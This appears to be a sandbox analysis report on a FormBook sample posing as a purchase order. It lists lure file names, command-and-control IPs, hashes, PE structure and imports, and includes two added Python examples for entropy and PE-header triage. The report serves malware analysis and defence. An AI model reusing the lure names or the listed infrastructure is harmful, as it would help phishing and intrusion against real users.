MULTIBAND-NEWHOPEUS | dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | malicious | FormBook | 209.74.64.187
CONTABODE | Quotation.exe | malicious | FormBook | 161.97.142.144
CONTABODE | payments.exe | malicious | FormBook | 161.97.142.144
CONTABODE | RFQ 3100185 MAHAD.exe | malicious | FormBook | 161.97.168.245
CONTABODE | need quotations.exe | malicious | FormBook | 161.97.168.245
CONTABODE | Ref#501032.vbe | malicious | MassLogger RAT | 144.91.79.54
CONTABODE | Swift copy.exe | malicious | FormBook | 161.97.142.144
CONTABODE | ajbKFgQ0Fl.exe | malicious | Unknown | 80.241.214.102
CONTABODE | Ref#150062.vbe | malicious | MassLogger RAT | 144.91.79.54
CONTABODE | Quotation request -30112024_pdf.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 4c9ebxnhQk.exe | malicious | Unknown | 80.241.214.102
Process: C:\Windows\SysWOW64\pcaui.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\PO #2411071822.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.995433409968477
Encrypted: true
SSDEEP: 6144:qPzGFGUOzmxydzSAJlBPU2uT3vfvg1q+1iHvLIpl+0wrjn3E4znvpy4YP:4zPRvl+53vfvOj1mmxwrjU2Q4YP
MD5: CDE3AD910A5684A6EAE97197BAF8B616
SHA1: 51BBAC28152851B33722A5260828760CBBE9EF95
SHA-256: A517840B37FF33BBAA138F6BCED89803A27750CE79B610DD6057E07122FD86AA
SHA-512: 0F925A9EFE6D28B5CC8FB9872E84D3573CFAA0442CCB2BB260F90C9AEDCA889768751F43C9287028DA18A067D1AC17232025184138ED6B2D7A68B1D44A96085C
Malicious: false
Reputation: low
                                                                                                            Preview:...A@MSJPEUB..B3.F17QRYY.ACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3.F17_M.WI.J.r.U..c.Y+@a6CX6 84i""#=% e7'lC7]a/_....y$.'(}GYOqBL1B3AFH6X.d9..~-4.i%2.V...{&V.K..u!$.I...i"+..Z"..W6.YYIACMSJ..UB.0C3F..nQRYYIACM.JVD^CG1BeEF17QRYYIA.^SJTUUBLAF3AFq7QBYYICCMUJTEUBL1D3AF17QRY)MACOSJTEUBN1..AF!7QBYYIASMSZTEUBL1R3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1lG$>E7QR..MAC]SJT.QBL!B3AF17QRYYIACMsJT%UBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTE
Process: C:\Users\user\Desktop\PO #2411071822.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.995433409968477
Encrypted: true
SSDEEP: 6144:qPzGFGUOzmxydzSAJlBPU2uT3vfvg1q+1iHvLIpl+0wrjn3E4znvpy4YP:4zPRvl+53vfvOj1mmxwrjU2Q4YP
MD5: CDE3AD910A5684A6EAE97197BAF8B616
SHA1: 51BBAC28152851B33722A5260828760CBBE9EF95
SHA-256: A517840B37FF33BBAA138F6BCED89803A27750CE79B610DD6057E07122FD86AA
SHA-512: 0F925A9EFE6D28B5CC8FB9872E84D3573CFAA0442CCB2BB260F90C9AEDCA889768751F43C9287028DA18A067D1AC17232025184138ED6B2D7A68B1D44A96085C
Malicious: false
                                                                                                            Preview:...A@MSJPEUB..B3.F17QRYY.ACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3.F17_M.WI.J.r.U..c.Y+@a6CX6 84i""#=% e7'lC7]a/_....y$.'(}GYOqBL1B3AFH6X.d9..~-4.i%2.V...{&V.K..u!$.I...i"+..Z"..W6.YYIACMSJ..UB.0C3F..nQRYYIACM.JVD^CG1BeEF17QRYYIA.^SJTUUBLAF3AFq7QBYYICCMUJTEUBL1D3AF17QRY)MACOSJTEUBN1..AF!7QBYYIASMSZTEUBL1R3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1lG$>E7QR..MAC]SJT.QBL!B3AF17QRYYIACMsJT%UBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTE
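The Entropy (8bit) and Encrypted fields are what separate the 1.12-bit SQLite database from the 7.995-bit dropped blob above. The Python below is an added example, not code from the Joe Sandbox report or its tooling: it computes 8-bit Shannon entropy in bits per byte (0 for a constant buffer, 8 for uniformly distributed bytes), scans a buffer in fixed-size blocks so an embedded high-entropy region can be located by offset, and applies an assumed 7.0 bits/byte cut-off for "likely encrypted or compressed" (the report does not state its own threshold). The inputs are constructed in memory: a header-only SQLite-like file and a seeded pseudo-random blob standing in for the dropped payload.

```python
import math
import random
from collections import Counter

# ASSUMED cut-off for "likely encrypted or compressed"; the report's own
# threshold for its Encrypted: true/false field is not stated on the page.
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer,
    8.0 when all 256 byte values occur equally often."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_profile(data: bytes, block: int = 4096) -> list:
    """Entropy of each fixed-size block, so a high-entropy payload embedded
    in an otherwise low-entropy file can be located by offset."""
    return [shannon_entropy(data[i:i + block]) for i in range(0, len(data), block)]


def looks_encrypted(data: bytes, threshold: float = ENTROPY_THRESHOLD) -> bool:
    """True when whole-buffer entropy is at or above the threshold. Compressed
    formats (zip, png, jpeg) score just as high, so treat this as a triage
    hint, not as proof of encryption."""
    return shannon_entropy(data) >= threshold


def high_entropy_regions(data: bytes, block: int = 4096,
                         threshold: float = ENTROPY_THRESHOLD) -> list:
    """(offset, entropy) for every block at or above the threshold."""
    return [(i * block, e) for i, e in enumerate(entropy_profile(data, block))
            if e >= threshold]


# CONSTRUCTED inputs: a SQLite-like file (magic string plus zeroed pages) and
# the same file with a 16 KiB pseudo-random blob appended, standing in for the
# 7.99-bit dropped payload. random.Random(1) is seeded for reproducibility and
# is not cryptographic randomness.
SQLITE_LIKE = b"SQLite format 3\0" + b"\0" * (8192 - 16)
RANDOM_BLOB = random.Random(1).randbytes(16384)
CARRIER = SQLITE_LIKE + RANDOM_BLOB

if __name__ == "__main__":
    for label, buf in (("sqlite-like", SQLITE_LIKE), ("random blob", RANDOM_BLOB)):
        print(f"{label}: {shannon_entropy(buf):.3f} bits/byte, "
              f"encrypted={looks_encrypted(buf)}")
    for off, e in high_entropy_regions(CARRIER):
        print(f"high-entropy block at offset {off:#x}: {e:.3f} bits/byte")
```

A whole-file score hides structure: a packed stub with a short plaintext header and a large encrypted overlay scores high overall, while a large mostly-empty file with a small embedded payload scores low. The block profile is what tells the two apart, and the offsets it returns are where to start carving.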
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.149000818737427
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PO #2411071822.exe
File size: 1'213'440 bytes
MD5: 564780e97b7357ca98fc62db3df63809
SHA1: cf356f775304d3bb066be358353ff1cc96689fd2
SHA256: 14bc9f9cd6cfa43bf361789b26b16a95e6867c8bbd5bd78670b19da25bc729ef
SHA512: 3481c15ad0f18a2b7a3cfb65429c81cb0da0550668ba82d51f947d64954640b4086245c2fc828d2458fa9bcee66d19d4de7a63caa7237051321a1354bc657745
SSDEEP: 24576:Ctb20pkaCqT5TBWgNQ7aSDV7xYNovcZ6A:PVg5tQ7aSD+ovw5
TLSH: F945D01273DD8361C7B25273BA267701BEBF782506A1F56B2FD8093DE920162521EB73
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673FC0C8 [Thu Nov 21 23:22:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
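Every field in the block above (time stamp, entrypoint, image base, subsystem, the two characteristics sets, the signature check and the data-directory-to-section mapping) is read straight out of the PE headers. The Python below is an added example, not the sandbox's own parser: it walks the DOS header to e_lfanew, reads the file header and PE32 optional header, decodes the link-time stamp, resolves the entrypoint RVA to its section, names the flag bits, and maps each data directory to the section containing it, which is the same lookup that yields the Entrypoint Section and Is in Section values in this report. Its input is a constructed, header-only PE32 image carrying the values the report shows for this sample; the section layout (RVAs and virtual sizes of .text, .rdata, .data, .rsrc, .reloc) is an assumption chosen so the report's directory RVAs land in the sections it names.

```python
import struct
from datetime import datetime, timezone

# Flag names for IMAGE_FILE_HEADER.Characteristics and
# IMAGE_OPTIONAL_HEADER.DllCharacteristics (values from winnt.h).
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
                        0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY",
                   "BASERELOC", "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS",
                   "LOAD_CONFIG", "BOUND_IMPORT", "IAT", "DELAY_IMPORT",
                   "COM_DESCRIPTOR", "RESERVED"]


def parse_pe32(data: bytes) -> dict:
    """Read the DOS, file and optional headers of a PE32 image (headers only,
    no section contents needed) and return the fields a triage report lists."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    fh = e_lfanew + 4                      # IMAGE_FILE_HEADER
    nsections, timestamp = struct.unpack_from("<HI", data, fh + 2)
    opt_size, characteristics = struct.unpack_from("<HH", data, fh + 16)
    opt = fh + 20                          # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header (PE32+ not handled here)")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]

    # Section table follows the optional header; keep [VA, VA + VirtualSize).
    sections = []
    for i in range(nsections):
        name, vsize, va = struct.unpack_from("<8sII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, va + vsize))

    def section_of(rva):
        return next((n for n, lo, hi in sections if lo <= rva < hi), None)

    directories = []
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        name = DIRECTORY_NAMES[i]
        # SECURITY stores a raw file offset, not an RVA, so it never maps to a section.
        sect = None if size == 0 or name == "SECURITY" else section_of(rva)
        directories.append((name, rva, size, sect))
    security_size = directories[4][2] if len(directories) > 4 else 0

    return {
        "compile_time": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "entrypoint": image_base + entry_rva,
        "entrypoint_section": section_of(entry_rva),
        "image_base": image_base,
        "subsystem": {2: "windows gui", 3: "windows cui"}.get(subsystem, hex(subsystem)),
        "characteristics": [n for b, n in FILE_CHARACTERISTICS.items() if characteristics & b],
        "dll_characteristics": [n for b, n in DLL_CHARACTERISTICS.items() if dll_chars & b],
        # Zero-size SECURITY directory: no Authenticode blob at all. Non-zero only
        # means a blob is attached, not that the signature verifies.
        "has_signature_blob": security_size != 0,
        "directories": directories,
    }


def build_sample() -> bytes:
    """CONSTRUCTED header-only PE32 using the values the report shows for this
    sample. The section layout below is an ASSUMPTION chosen so that the
    report's directory RVAs fall into the sections the report names."""
    sections = [(b".text", 0x1000, 0x8B000), (b".rdata", 0x8C000, 0x2C000),
                (b".data", 0xB8000, 0xC000), (b".rsrc", 0xC4000, 0x5F2E0),
                (b".reloc", 0x124000, 0x6C4C)]          # (name, VA, VirtualSize)
    dirs = {1: (0xB7004, 0x17C), 2: (0xC4000, 0x5F2E0),  # IMPORT, RESOURCE
            5: (0x124000, 0x6C4C), 6: (0x8D8D0, 0x1C)}   # BASERELOC, DEBUG
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x673FC0C8, 0, 0, 224, 0x0122)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 11, 0, 0, 0, 0, 0x25F74, 0x1000, 0xB8000, 0x400000,
                      0x1000, 0x200, 5, 1, 5, 1, 5, 1, 0, 0x12B000, 0x400, 0,
                      2, 0x8040, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *dirs.get(i, (0, 0))) for i in range(16))
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, 0, 0, 0, 0, 0, 0, 0)
                     for n, va, vs in sections)
    return dos + b"PE\0\0" + file_hdr + opt + table


if __name__ == "__main__":
    r = parse_pe32(build_sample())
    print(f"link time {r['compile_time']:%Y-%m-%d %H:%M:%S} UTC, "
          f"entry {r['entrypoint']:#x} in {r['entrypoint_section']}, "
          f"signature blob: {r['has_signature_blob']}")
    for name, rva, size, sect in r["directories"]:
        if size:
            print(f"  {name:<10} rva={rva:#08x} size={size:#06x} section={sect}")
```

Two caveats when reading these fields off a real sample: the time stamp is written by whoever links or patches the file and is trivially forged, so it is a claim to corroborate against other evidence rather than a fact; and "Digitally signed: false" only reports that the SECURITY directory is empty, so a non-empty one on another sample still needs the signature chain verified before it counts for anything.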
Entrypoint instruction preview:
                                                                                                            call 00007F3244DB67EFh
                                                                                                            jmp 00007F3244DA9804h
                                                                                                            int3
                                                                                                            int3
                                                                                                            push edi
                                                                                                            push esi
                                                                                                            mov esi, dword ptr [esp+10h]
                                                                                                            mov ecx, dword ptr [esp+14h]
                                                                                                            mov edi, dword ptr [esp+0Ch]
                                                                                                            mov eax, ecx
                                                                                                            mov edx, ecx
                                                                                                            add eax, esi
                                                                                                            cmp edi, esi
                                                                                                            jbe 00007F3244DA998Ah
                                                                                                            cmp edi, eax
                                                                                                            jc 00007F3244DA9CEEh
                                                                                                            bt dword ptr [004C0158h], 01h
                                                                                                            jnc 00007F3244DA9989h
                                                                                                            rep movsb
                                                                                                            jmp 00007F3244DA9C9Ch
                                                                                                            cmp ecx, 00000080h
                                                                                                            jc 00007F3244DA9B54h
                                                                                                            mov eax, edi
                                                                                                            xor eax, esi
                                                                                                            test eax, 0000000Fh
                                                                                                            jne 00007F3244DA9990h
                                                                                                            bt dword ptr [004BA370h], 01h
                                                                                                            jc 00007F3244DA9E60h
                                                                                                            bt dword ptr [004C0158h], 00000000h
                                                                                                            jnc 00007F3244DA9B2Dh
                                                                                                            test edi, 00000003h
                                                                                                            jne 00007F3244DA9B3Eh
                                                                                                            test esi, 00000003h
                                                                                                            jne 00007F3244DA9B1Dh
                                                                                                            bt edi, 02h
                                                                                                            jnc 00007F3244DA998Fh
                                                                                                            mov eax, dword ptr [esi]
                                                                                                            sub ecx, 04h
                                                                                                            lea esi, dword ptr [esi+04h]
                                                                                                            mov dword ptr [edi], eax
                                                                                                            lea edi, dword ptr [edi+04h]
                                                                                                            bt edi, 03h
                                                                                                            jnc 00007F3244DA9993h
                                                                                                            movq xmm1, qword ptr [esi]
                                                                                                            sub ecx, 08h
                                                                                                            lea esi, dword ptr [esi+08h]
                                                                                                            movq qword ptr [edi], xmm1
                                                                                                            lea edi, dword ptr [edi+08h]
                                                                                                            test esi, 00000007h
                                                                                                            je 00007F3244DA99E5h
                                                                                                            bt esi, 03h
                                                                                                            jnc 00007F3244DA9A38h
                                                                                                            movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5f2e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5f2e0 | 0x5f400 | fc7d0251f6a2ef647ac94ea741978ceb | False | 0.9327248400590551 | data | 7.9067490435877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x124000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xc9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xca148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xca6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc410 | 0x569b7 | data | | | 1.0003269972909965
RT_GROUP_ICON | 0x122dc8 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x122e40 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x122e54 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x122f30 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
